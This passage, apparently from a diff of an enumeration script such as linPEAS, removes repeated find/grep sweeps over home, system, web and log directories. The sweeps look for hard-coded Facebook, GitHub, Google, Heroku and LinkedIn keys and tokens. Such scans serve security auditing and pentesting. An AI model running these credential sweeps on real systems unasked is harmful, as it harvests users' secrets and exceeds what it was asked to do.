"[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[fF][aA][cC][eE][bB][oO][oO][kK].*['|\"][0-9a-f]{32}['|\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Facebook Secret Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9a-f]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Github (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "github(.{0,20})?['\"][0-9a-zA-Z]{35,40}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Google API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "AIza[0-9A-Za-z_\-]{35}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Google Cloud Platform API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Google Drive Oauth (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Google Oauth Access Token (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Heroku API Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching LinkedIn Client ID (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching LinkedIn Secret Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE 